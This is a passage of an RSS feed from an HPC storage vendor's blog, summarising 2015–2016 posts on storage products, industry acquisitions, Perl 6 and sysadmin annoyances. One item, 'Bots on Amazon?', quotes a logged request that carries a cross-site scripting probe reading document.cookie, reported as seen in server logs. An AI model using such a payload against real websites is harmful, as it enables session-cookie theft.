      <link>https://blog.scalability.org/2016/01/container-jutsu/</link>
      <pubDate>Wed, 13 Jan 2016 04:54:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/container-jutsu/</guid>
      <description>Linux containers are all the rage, with Docker, rkt, lxd, etc. all in market to various degrees. You have companies like Docker, CoreOS, and Rancher all vying for mindshare, not to mention some of the plumbing bits by google and many others. I don&amp;rsquo;t think they are a fad, there is much that is good with containers, when they are done right. To see how they are done right, have a good hard long look at SmartOS.</description>
    </item>
    
    <item>
      <title>Hard filtering of calls</title>
      <link>https://blog.scalability.org/2016/01/hard-filtering-of-calls/</link>
      <pubDate>Mon, 11 Jan 2016 18:38:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2016/01/hard-filtering-of-calls/</guid>
      <description>I find that, over time, my cell phone number has propagated out to spammers/scammers whom want to call me up to sell me something. The US national do-not-call registry hasn&amp;rsquo;t helped. The complaints I&amp;rsquo;ve filed haven&amp;rsquo;t helped. So I filter. My filtering algo looks like this:
if (number_is_known_person_or_org(phone_number)) { take_call_if_possible(); else if (number_is_unknown(phone_number)) { filter_stage_2(phone_number) } function filter_stage_2(phone_number) { // I ignore 80% of numbers I don&#39;t know, let them go to // voicemail.</description>
    </item>
    
    <item>
      <title>Nutanix files for IPO</title>
      <link>https://blog.scalability.org/2015/12/nutanix-files-for-ipo/</link>
      <pubDate>Wed, 23 Dec 2015 14:56:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/nutanix-files-for-ipo/</guid>
      <description>Short story here. I am not going to pour over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.</description>
    </item>
    
    <item>
      <title>Toshiba contemplating spinning out NAND flash</title>
      <link>https://blog.scalability.org/2015/12/toshiba-contemplating-spinning-out-nand-flash/</link>
      <pubDate>Wed, 23 Dec 2015 14:39:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/toshiba-contemplating-spinning-out-nand-flash/</guid>
      <description>This is remarkable if true, and if they follow through with it, it will change the landscape of Flash quite a bit. Right now there are 43 major flash providers, and a few smaller ones. Building flash fabs is expensive, even given the demand and process improvements, there is still quite a bit of investment required to set up a flash fab. Toshiba has some cool kit here, we&amp;rsquo;ve worked with it (and in full disclosure, we were talking about working more closely with them in the past).</description>
    </item>
    
    <item>
      <title>Google GMail is broken, not passing emails, losing others</title>
      <link>https://blog.scalability.org/2015/12/google-gmail-is-broken-not-passing-emails-losing-others/</link>
      <pubDate>Tue, 22 Dec 2015 23:00:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/google-gmail-is-broken-not-passing-emails-losing-others/</guid>
      <description>Yeah, the headline says it all. The reason I rolled to GMail (and am paying for it for each user and then some) for the corporate services was, well, they promised to make running email easy, painless, and I wouldn&amp;rsquo;t have to worry about email management any more. Now I have to worry about pissed off customers whom are angry at me for not responding, even though I see the outbound emails in my sent folder, and from our ticketing system.</description>
    </item>
    
    <item>
      <title>M&amp;A:  NetApp grabs SolidFire</title>
      <link>https://blog.scalability.org/2015/12/ma-netapp-grabs-solidfire/</link>
      <pubDate>Tue, 22 Dec 2015 15:36:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/ma-netapp-grabs-solidfire/</guid>
      <description>This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart &amp;ldquo;filer heads&amp;rdquo;. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.</description>
    </item>
    
    <item>
      <title>Good read on market sizing for VCs and entrepreneurs</title>
      <link>https://blog.scalability.org/2015/12/good-read-on-market-sizing-for-vcs-and-entrepreneurs/</link>
      <pubDate>Tue, 15 Dec 2015 12:37:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/good-read-on-market-sizing-for-vcs-and-entrepreneurs/</guid>
      <description>Not a how to guide, but a higher level meta discussion &amp;hellip; about that market size discussion. See here. I&amp;rsquo;ve experienced the endless cycle of meetings over &amp;ldquo;size of market&amp;rdquo;. Not fun. These days, I have a very simple classifier with respect to investors.
foreach investor (list_of_investors) { if (investor-&amp;gt;says_yes_sends_term_sheet_and_check) { put_money_to_work_building_value() } else { add_to_list_of_investors_who_didnt_say_yes_and_follow_through_with_money() } }  This is pseudo code for the algo you need. Any answer which is yes is good.</description>
    </item>
    
    <item>
      <title>Bots on Amazon?</title>
      <link>https://blog.scalability.org/2015/12/bots-on-amazon/</link>
      <pubDate>Mon, 14 Dec 2015 22:38:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/bots-on-amazon/</guid>
      <description>Seeing lots of these in my web server logs:
https://scalableinformatics.com/?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E  which are sent there from a sentinel redirection mechanism on a different web server. A number, maybe 10 or so? Amazon hosts are now doing this. I am guessing this would be real darned easy to trace back to the sources. And either someone&amp;rsquo;s instance in the cloud is not under their control, or someone is paying Amazon to let them run bots.</description>
    </item>
    
    <item>
      <title>Watching dracut, udev, systemd, and plymouth all battle each other for nfs/ramboot</title>
      <link>https://blog.scalability.org/2015/12/watching-dracut-udev-systemd-and-plymouth-all-battle-each-other-for-nfsramboot/</link>
      <pubDate>Thu, 10 Dec 2015 19:38:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/watching-dracut-udev-systemd-and-plymouth-all-battle-each-other-for-nfsramboot/</guid>
      <description>I can&amp;rsquo;t even begin to describe the complete and utter broken-ness of this mess. This doesn&amp;rsquo;t look like systemd issue, its just the poor stack trying to get everything else working. But plymouth. Seriously. It should be given the old-yeller treatment. And watching udev not &amp;hellip; settle &amp;hellip; is &amp;hellip; amusing. While its doing that, the dracut options of debug, drop to a shell, break, etc. aren&amp;rsquo;t working. This isn&amp;rsquo;t engineering at this point.</description>
    </item>
    
    <item>
      <title>#Perl6 compiler betas are ready</title>
      <link>https://blog.scalability.org/2015/12/perl6-compiler-betas-are-ready/</link>
      <pubDate>Sat, 05 Dec 2015 17:01:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/perl6-compiler-betas-are-ready/</guid>
      <description>Ok &amp;hellip; I am &amp;hellip; well &amp;hellip; blown away. I had thought Perl6 would be the Duke Nukem forever of programming languages. Indeed, it has been in active development for more than a decade. But you can download compilers (yes, you heard me right, compilers) for it now. You might say &amp;ldquo;why perl&amp;rdquo; or &amp;ldquo;why perl6&amp;rdquo; or &amp;ldquo;why now, because we have #insert(language_x) and its wonderful&amp;rdquo;. Good question, I wasn&amp;rsquo;t sure why it was relevant, until I started reading some of the code.</description>
    </item>
    
    <item>
      <title>Testing a new @scalableinfo Unison #Ceph appliance node for #hpc #storage</title>
      <link>https://blog.scalability.org/2015/12/testing-a-new-scalableinfo-unison-ceph-appliance-node-for-hpc-storage/</link>
      <pubDate>Sat, 05 Dec 2015 16:34:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/testing-a-new-scalableinfo-unison-ceph-appliance-node-for-hpc-storage/</guid>
      <description>Simple test case, no file system &amp;hellip; using raw devices, what can I push out to all 60 drives in 128k chunks. Actually this is part of our burn-in test series, I am looking for failures/performance anomalies.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 0 1 95 5 0 0| 513M 0 | 480B 0 | 0 0 | 10k 20k 4 2 94 0 0 0| 0 0 | 480B 0 | 0 0 |5238 721 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4913 352 0 2 98 0 0 0| 0 0 | 570B 90B| 0 0 |4966 613 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4912 413 0 2 98 0 0 0| 0 0 | 584B 92B| 0 0 |4965 334 0 2 98 0 0 0| 0 0 | 480B 0 | 0 0 |4914 306 0 2 98 0 0 0| 0 0 | 636B 147B| 0 0 |4969 483 0 2 98 0 0 0| 0 0 | 570B 0 | 0 0 |4915 377 8 8 50 32 0 2|7520k 8382M| 578B 0 | 0 0 | 76k 215k 9 7 30 52 0 3|8332k 12G| 960B 132B| 0 0 | 109k 279k 10 5 29 53 0 2|4136k 12G| 240B 0 | 0 0 | 109k 277k 12 6 29 51 0 2|4208k 12G| 240B 0 | 0 0 | 108k 280k 11 6 31 50 0 2|2244k 12G| 330B 90B| 0 0 | 109k 281k 11 6 30 50 0 3|2272k 13G| 240B 0 | 0 0 | 110k 281k  Writes around 12.</description>
    </item>
    
    <item>
      <title>10TB PMR drives for Unison #hpc #storage systems, think 600TB/4U unit with @BeeGFS, @Ceph, and others</title>
      <link>https://blog.scalability.org/2015/12/10tb-pmr-drives-for-unison-hpc-storage-systems-think-600tb4u-unit-with-beegfs-ceph-and-others/</link>
      <pubDate>Thu, 03 Dec 2015 02:54:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/10tb-pmr-drives-for-unison-hpc-storage-systems-think-600tb4u-unit-with-beegfs-ceph-and-others/</guid>
      <description>WD/HGST just released details on a PMR (aka &amp;ldquo;real&amp;rdquo;, non-archive class) hard disk. You can read the specs here. We will be offering these in Unison HPC storage systems, to provide up to 600TB/4U unit, or up to 6PB per rack of 10 unison chassis. Coupled with our 100Gb fabric, we expect to be able to drive about 8-9 GB/s per chassis. And thats before we leverage the distributed journaling/metadata NVMe&amp;rsquo;s rear mounted on the units.</description>
    </item>
    
    <item>
      <title>Video interview: face melting performance in #hpc #nvme #storage @scalableinfo</title>
      <link>https://blog.scalability.org/2015/12/video-interview-face-melting-performance-in-hpc-nvme-storage-scalableinfo/</link>
      <pubDate>Tue, 01 Dec 2015 20:47:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/12/video-interview-face-melting-performance-in-hpc-nvme-storage-scalableinfo/</guid>
      <description>Oh no &amp;hellip; we didn&amp;rsquo;t say &amp;ldquo;face melting&amp;rdquo; &amp;hellip; did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich&amp;rsquo;s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.</description>
    </item>
    
    <item>
      <title>There are no silver bullets, 2015 edition</title>
      <link>https://blog.scalability.org/2015/11/there-are-no-silver-bullets-2015-edition/</link>
      <pubDate>Wed, 25 Nov 2015 17:53:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/there-are-no-silver-bullets-2015-edition/</guid>
      <description>In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big &amp;hellip; uh &amp;hellip; &amp;ldquo;data&amp;rdquo; ?) into golden nuggets of actionable data. Many of the &amp;ldquo;solutions&amp;rdquo; marketed these days are exactly like that &amp;hellip; &amp;ldquo;add our magic bean software to your pipeline and you will gain insight faster.</description>
    </item>
    
    <item>
      <title>The 1980s called and want their software licensing models back</title>
      <link>https://blog.scalability.org/2015/11/the-1980s-called-and-want-their-software-licensing-models-back/</link>
      <pubDate>Wed, 25 Nov 2015 17:29:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/the-1980s-called-and-want-their-software-licensing-models-back/</guid>
      <description>So here I am, the day before thanksgiving, fighting a battle with a reluctant license server that wants to compute a hash of internal bits on a machine, in order to use to unlock a license key, to let software run. This is not for us, but for a customer. At their site. This is the same model from the 1980s and early 90s. Create a hash from a collection of things (or a dongle you attach to a serial/parallel port).</description>
    </item>
    
    <item>
      <title>I always thought a Ph.D. defense should have a dance component</title>
      <link>https://blog.scalability.org/2015/11/i-always-thought-a-ph-d-defense-should-have-a-dance-component/</link>
      <pubDate>Wed, 25 Nov 2015 14:50:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/i-always-thought-a-ph-d-defense-should-have-a-dance-component/</guid>
      <description>As seen here. I like the enTANGOeled photons. Not sure how I&amp;rsquo;d do mine, but its at least amusing to think through.</description>
    </item>
    
    <item>
      <title>A wonderful read on metrics, profiling, benchmarking</title>
      <link>https://blog.scalability.org/2015/11/a-wonderful-read-on-metrics-profiling-benchmarking/</link>
      <pubDate>Tue, 24 Nov 2015 16:23:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/a-wonderful-read-on-metrics-profiling-benchmarking/</guid>
      <description>Brendan Gregg&amp;rsquo;s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on &amp;ldquo;Broken Performance Tools&amp;rdquo;. It is wonderful, and succinctly explains many thing I&amp;rsquo;ve talked about here and elsewhere, but it goes far beyond what I&amp;rsquo;ve grumbled over. One of my favorite points in there is slide 83. &amp;ldquo;Most popular benchmarks are flawed&amp;rdquo; and a pointer to a paper (easy to google for).</description>
    </item>
    
    <item>
      <title>Massive Unapologetic Firepower part 3:  Forte</title>
      <link>https://blog.scalability.org/2015/11/massive-unapologetic-firepower-part-3-forte/</link>
      <pubDate>Wed, 18 Nov 2015 22:53:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/massive-unapologetic-firepower-part-3-forte/</guid>
      <description>Forte has uncloaked, website is being updated. You can email me (landman@scalableinformatics.com) for more info. Pictures speak louder than words. Have a look.
That is 20+ GB/s for streaming sequential IO. Then, 4kB random reads &amp;hellip;
That is, 5+ Million IOPs. Specs include Price point for this is $50k for 48TB, $1/GB. Pre-order now, shipping in a few weeks.</description>
    </item>
    
    <item>
      <title>Shiny #HPC #storage things at #SC15</title>
      <link>https://blog.scalability.org/2015/11/shiny-hpc-storage-things-at-sc15/</link>
      <pubDate>Tue, 10 Nov 2015 13:58:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/11/shiny-hpc-storage-things-at-sc15/</guid>
      <description>Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
 * 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte  100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s &amp;hellip; it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.</description>
    </item>
    
    <item>
      <title>Moving inventory out to make room for new stuff</title>
      <link>https://blog.scalability.org/2015/10/moving-inventory-out-to-make-room-for-new-stuff/</link>
      <pubDate>Thu, 29 Oct 2015 20:56:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/moving-inventory-out-to-make-room-for-new-stuff/</guid>
      <description>We have a bunch of units to move out. These are from a recent POC project, and we have a new architecture project that needs all that rack space and then some &amp;hellip; the team are building Franken-boxen clients for this project, so we have enough requestors on the network. Parts start arriving next week for that, and we really need to clear this out soon. I hate seeing good gear sitting idle on a storage shelf when it could be helping solve hard problems.</description>
    </item>
    
    <item>
      <title>Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up</title>
      <link>https://blog.scalability.org/2015/10/cat-peeking-out-of-bag-schedule-of-presentations-and-talks-in-our-booth-for-sc15-is-up/</link>
      <pubDate>Thu, 29 Oct 2015 12:54:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/cat-peeking-out-of-bag-schedule-of-presentations-and-talks-in-our-booth-for-sc15-is-up/</guid>
      <description>I mentioned previously that we have some new (shiny) things &amp;hellip; and it looks like you&amp;rsquo;ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
 Fintan Quill from Kx on kdb+ &amp;hellip; which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS &amp;hellip; the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph &amp;hellip; the reliable block and object storage system that we&amp;rsquo;ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.</description>
    </item>
    
    <item>
      <title>sios-metrics core rewritten</title>
      <link>https://blog.scalability.org/2015/10/sios-metrics-core-rewritten/</link>
      <pubDate>Tue, 27 Oct 2015 05:15:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/sios-metrics-core-rewritten/</guid>
      <description>This was a long time coming. Something I needed to do, in order to build a far better code capable of using less network, less CPU power, and providing a better overall system. In short, I ripped out the graphite bits and wrote a native interface to InfluxDB. This interface will also be adapted to kdb+ (32 bit edition), and graphite as time allows. In the process, I cleaned up a tremendous amount of code.</description>
    </item>
    
    <item>
      <title>Just give me a huge fast storage system, and a mighty network to delivery it by</title>
      <link>https://blog.scalability.org/2015/10/just-give-me-a-huge-fast-storage-system-and-a-mighty-network-to-delivery-it-by/</link>
      <pubDate>Fri, 23 Oct 2015 19:56:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/just-give-me-a-huge-fast-storage-system-and-a-mighty-network-to-delivery-it-by/</guid>
      <description>A system in the lab. Here is a snapshot from our management GUI.
[ ](/images/unison-poc-system.png)
A couple things to note:
 In the lower right corner, you can see the size of the /mnt/unison file system. This is an all flash system. No, there is no compression, nor dedup going on here. We could, but most of the use cases we are dealing with these days &amp;hellip; this would not be a win.</description>
    </item>
    
    <item>
      <title>Looking forward to showing off a new product at SC15</title>
      <link>https://blog.scalability.org/2015/10/looking-forward-to-showing-off-a-new-product-at-sc15/</link>
      <pubDate>Thu, 22 Oct 2015 15:13:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/looking-forward-to-showing-off-a-new-product-at-sc15/</guid>
      <description>Think &amp;hellip; pretty interesting performance &amp;hellip; Think very &amp;hellip; very dense &amp;hellip; Think &amp;hellip; there may be some benchies leaked here soon.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Huge ... WD acquires SanDisk</title>
      <link>https://blog.scalability.org/2015/10/ma-huge-wd-acquires-sandisk/</link>
      <pubDate>Wed, 21 Oct 2015 15:16:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/ma-huge-wd-acquires-sandisk/</guid>
      <description>This is huge. Now Seagate has a relationship with Micron, Toshiba has its own disks and shares a fab with SanDisk (though I think with this acquisition, that will rapidly change). Ok &amp;hellip; so the HD vendors are busy snapping up the Flash makers. Is Micron next? Rumors of something have been swirling for a while. Note also, SanDisk has their InfiniFlash unit. WD simply did not have storage appliances. This gets them into that space, and directly competing with the likes of all the smaller startup all flash array (AFA) vendors.</description>
    </item>
    
    <item>
      <title>Finding needles in haystacks covered in a fallen down barn</title>
      <link>https://blog.scalability.org/2015/10/finding-needles-in-haystacks-covered-in-a-fallen-down-barn/</link>
      <pubDate>Sat, 17 Oct 2015 00:54:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/finding-needles-in-haystacks-covered-in-a-fallen-down-barn/</guid>
      <description>Ok &amp;hellip; this one was very annoying. Imagine you are trying to diagnose a system crash on a production unit. The crash is quite specific in the subsystems &amp;hellip; being one where the interrupt handler catches an exception, and then you start piling up softirq contexts. Its on the network side of things. You discover that the switch and the NIC are, somehow, incredibly, not quite compatible with each other. I can&amp;rsquo;t assign blame for this as I don&amp;rsquo;t know who is at fault.</description>
    </item>
    
    <item>
      <title>Ten years ago this blog was born</title>
      <link>https://blog.scalability.org/2015/10/ten-years-ago-this-blog-was-born/</link>
      <pubDate>Thu, 15 Oct 2015 03:02:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/ten-years-ago-this-blog-was-born/</guid>
      <description>This was my first post. On 12-October-2005. I&amp;rsquo;ve written about many things over the past decade. 2000 plus posts, 200 per year, averages about 4 every 7 days or so. I&amp;rsquo;ve slowed down a bit in recent months, as work has grown more intense, but there are many thoughts I want to get down. To a large extent, my journey through HPC has been an interesting one, and only slightly captured in these posts.</description>
    </item>
    
    <item>
      <title>M&amp;A:  EMC gobbled by Dell</title>
      <link>https://blog.scalability.org/2015/10/ma-emc-gobbled-by-dell/</link>
      <pubDate>Mon, 12 Oct 2015 15:57:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/ma-emc-gobbled-by-dell/</guid>
      <description>Need to think how this will play out. The Register&amp;rsquo;s take is here. It seems that this will solve the &amp;ldquo;shareholder value&amp;rdquo; problem indicated by Elliot Management (e.g. they wanted more return on their investment). As part of the increasing the return and value return to shareholders, EMC had been in a cost cutting mode. Layoffs have been in process, and likely products trimmed or refocused. Once this goes through (assuming regulators won&amp;rsquo;t protest), Dell will have</description>
    </item>
    
    <item>
      <title>The end of java in the browser</title>
      <link>https://blog.scalability.org/2015/10/the-end-of-java-in-the-browser/</link>
      <pubDate>Sat, 10 Oct 2015 21:08:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/the-end-of-java-in-the-browser/</guid>
      <description>Coming soon. Mozilla is turning off NPAPI support at the end of next year. Java and java applets rely upon NPAPI to work. Needless to say, Java support in the browser is going to end. While this is good news, they are still going to allow flash. Which is less good. What is interesting about this, is that this sunsets support for many of the remote console applications that depend upon Java (for the moment) to provide KVM like capabilities.</description>
    </item>
    
    <item>
      <title>Are the wheels coming off?</title>
      <link>https://blog.scalability.org/2015/10/are-the-wheels-coming-off/</link>
      <pubDate>Fri, 09 Oct 2015 12:26:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/are-the-wheels-coming-off/</guid>
      <description>From Term Sheet (required reading BTW)
Read it all. The thing about bubble valuations and unicorns &amp;hellip; neither one will last very long. Pure Storage IPOed this week and they aren&amp;rsquo;t doing as well in the public markets as their private market valuations might suggest. This is not to say they aren&amp;rsquo;t a good company, or don&amp;rsquo;t have a good product. This is saying that the demand for &amp;ldquo;unicorn&amp;rdquo; valuations from the buy side is &amp;hellip; well &amp;hellip; weak.</description>
    </item>
    
    <item>
      <title>possible M&amp;A:  Dell and EMC?</title>
      <link>https://blog.scalability.org/2015/10/possible-ma-dell-and-emc/</link>
      <pubDate>Thu, 08 Oct 2015 00:31:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/possible-ma-dell-and-emc/</guid>
      <description>Story is here. Not sure this is a great tie up &amp;hellip; EMC has lots of things Dell doesn&amp;rsquo;t need (and vice versa). Possibly parts of EMC (secession from the federation?) with Dell. I can&amp;rsquo;t imagine VMware wanting to tie up with one vendor. Nor Pivotal, etc. This said, Cisco pulled out of the venture with EMC to pursue its own directions, competitive with elements. But then they bought and subsequently closed Whiptail.</description>
    </item>
    
    <item>
      <title>End days must be on hand ... Perl 6 is out</title>
      <link>https://blog.scalability.org/2015/10/end-days-must-be-on-hand-perl-6-is-out/</link>
      <pubDate>Tue, 06 Oct 2015 23:10:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/end-days-must-be-on-hand-perl-6-is-out/</guid>
      <description>see for more details. I&amp;rsquo;d love to find a valid reason to play with it, but my near term foci are going to remain our current code base in Perl/C, nodejs for a few things, Julia/R for analysis. The joke about Perl 6 shipping by Christmas is now over &amp;hellip; as the correct response has been &amp;ldquo;what year&amp;rdquo;. Until this year it seems.</description>
    </item>
    
    <item>
      <title>M&amp;A: Cleversafe is snarfed up by IBM</title>
      <link>https://blog.scalability.org/2015/10/ma-cleversafe-is-snarfed-up-by-ibm/</link>
      <pubDate>Mon, 05 Oct 2015 19:07:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/10/ma-cleversafe-is-snarfed-up-by-ibm/</guid>
      <description>Cleversafe was acquired by IBM. Looks like 200 people making their way over. This is huge, as now Scality is basically the last independent standing, and I am guessing they won&amp;rsquo;t be alone for long.</description>
    </item>
    
    <item>
      <title>Voting in HPCWire&#39;s readers choice awards are open, please vote!</title>
      <link>https://blog.scalability.org/2015/09/voting-in-hpcwires-readers-choice-awards-are-open-please-vote/</link>
      <pubDate>Wed, 23 Sep 2015 19:20:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/voting-in-hpcwires-readers-choice-awards-are-open-please-vote/</guid>
      <description>Our friends at Lucera are in number 6 for best use of HPC in a financial services category. Our Unison product is at number 11 for Best HPC Storage Product or Technology. And I did a write in for #21 for us :D. Our friends at Mellanox have their 100Gb EDR Infiniband technology at number 14. Please do vote (early, not often).</description>
    </item>
    
    <item>
      <title>As the benchmark cooks</title>
      <link>https://blog.scalability.org/2015/09/as-the-benchmark-cooks/</link>
      <pubDate>Mon, 21 Sep 2015 19:44:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/as-the-benchmark-cooks/</guid>
      <description>We are involved in a fairly large benchmark for a potential customer. I won&amp;rsquo;t go into many specifics, though I should note that lots of our Unison units are involved. Current architecture has 5 storage nodes (6th was temporarily removed to handle a customer issue). Each Unison node has a pair of 56GbE NICs, as well as our appliance OS, and bunches of other goodness (quite a bit of flash). Total capacity for test is of order 200TB of flash.</description>
    </item>
    
    <item>
      <title>Inventory to sell to make room:  Cadence and several Unison/JackRabbits</title>
      <link>https://blog.scalability.org/2015/09/inventory-to-sell-to-make-room-cadence-and-several-unisonjackrabbits/</link>
      <pubDate>Fri, 18 Sep 2015 20:12:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/inventory-to-sell-to-make-room-cadence-and-several-unisonjackrabbits/</guid>
      <description>Very fast units, very reasonable prices. We are (again) running out of space in our lab, and really need to move this stuff out. Many of these have been demo/engineering machines for us, including the portable petabyte unit. We&amp;rsquo;ve got a Cadence box with 16TB of storage, which puts up performance numbers that other vendors would kill for &amp;hellip;
https://twitter.com/sijoe/status/606221680533508096
and
https://twitter.com/sijoe/status/606222084587388928
We&amp;rsquo;ve got the portable petabyte unit available (albeit with less than 1 PB).</description>
    </item>
    
    <item>
      <title>Updated net-tools bits</title>
      <link>https://blog.scalability.org/2015/09/updated-net-tools-bits/</link>
      <pubDate>Tue, 08 Sep 2015 04:18:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/updated-net-tools-bits/</guid>
      <description>So far, 3 components, and working to fix a few things in formatting. On github, grab it here. First, lsbond.pl to report about bond details
root@unison-mgr-1:~/net-tools# ./lsbond.pl bond0:	mac 0c:c4:7a:48:69:cb state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth1 polling 100 ms up_delay 200 ms down_delay 200 ms slave nics: eth1: mac 0c:c4:7a:48:69:cb, link 1, state up, speed 1000, driver igb, version 5.3.2.2 firmware version 1.61,0x8000090e bond1:	mac 00:12:c0:80:26:76 state up mode fault-tolerance (active-backup) xmit_hash layer2 0 active slave eth3 polling 100 ms up_delay 200 ms down_delay 200 ms slave nics: eth2: mac 00:12:c0:80:26:76, link 1, state up, speed 10000, driver ixgbe, version 4.</description>
    </item>
    
    <item>
      <title>Unison Ceph beats reference architecture, including the flavor with NVMe drives</title>
      <link>https://blog.scalability.org/2015/09/unison-ceph-beats-reference-architecture-including-the-flavor-with-nvme-drives/</link>
      <pubDate>Wed, 02 Sep 2015 23:02:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/09/unison-ceph-beats-reference-architecture-including-the-flavor-with-nvme-drives/</guid>
      <description>The paper is here. We focused on our product mix and the rough comparables in the report. Our units are immediately available as well, preloaded/preconfigured with Ceph. The takeaway is this:
[ ](https://scalableinformatics.com/assets/documents/Unison-Ceph-Performance.pdf)
Whats really interesting in this is that the 36+2 reference architecture makes use of 2x NVMe drives. And as you can see, they really don&amp;rsquo;t help much in the tests. This is not to say NVMe is bad; its not.</description>
    </item>
    
    <item>
      <title>Nominate your favorite HPC product and company for a readers choice award</title>
      <link>https://blog.scalability.org/2015/08/nominate-your-favorite-hpc-product-and-company-for-a-readers-choice-award/</link>
      <pubDate>Thu, 27 Aug 2015 15:57:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/nominate-your-favorite-hpc-product-and-company-for-a-readers-choice-award/</guid>
      <description>Please go here and nominate! Last year, our customer Lucera, won best in Financial Services. We built the vast majority of their infrastructure, so we like to think we contributed in some manner to their success. This year, please don&amp;rsquo;t hesitate to nominate us (or second/third/etc.) for Best HPC Storage Product of Technology for Scalable Informatics Unison product, or whatever you&amp;rsquo;d like. In addition to the nomination for Unison in storage, I put in nominations for Cadence in Financial Services, and in Data Intensive computing.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Seagate snarfs up DotHill</title>
      <link>https://blog.scalability.org/2015/08/ma-seagate-snarfs-up-dothill/</link>
      <pubDate>Wed, 19 Aug 2015 12:33:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/ma-seagate-snarfs-up-dothill/</guid>
      <description>The Register reports this morning, that Seagate has acquired DotHill. DotHill makes arrays and their kit is resold and rebadged by many. In general the array market (high end) is in a decline, and doesn&amp;rsquo;t show signs of turning around (ever). The low and mid market, including some of the cloud bits is growing. I am not sure about the OCP stuff, but the low end bits are where we are seeing 4, 8, and 12 drive arrays show up as completely commoditized gear.</description>
    </item>
    
    <item>
      <title>IPO:  Pure Storage files</title>
      <link>https://blog.scalability.org/2015/08/ipo-pure-storage-files/</link>
      <pubDate>Thu, 13 Aug 2015 13:14:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/08/ipo-pure-storage-files/</guid>
      <description>Not really an HPC/Big Data play (yet). But they have filed. The traditional array market is in a decline, and depending upon how you view it, its either merely a steep decline, or an out-and-out death spiral. The tier1 vendors are defending a shrinking turf against aggressive smaller and more focused players. Moreover, flash is set to overtake disk in terms of lower cost to deploy in very short order. This plays well for folks like Pure and a few others, though the market they are playing in is in decline.</description>
    </item>
    
    <item>
      <title>rebuilding our kernel build system for fun and profit</title>
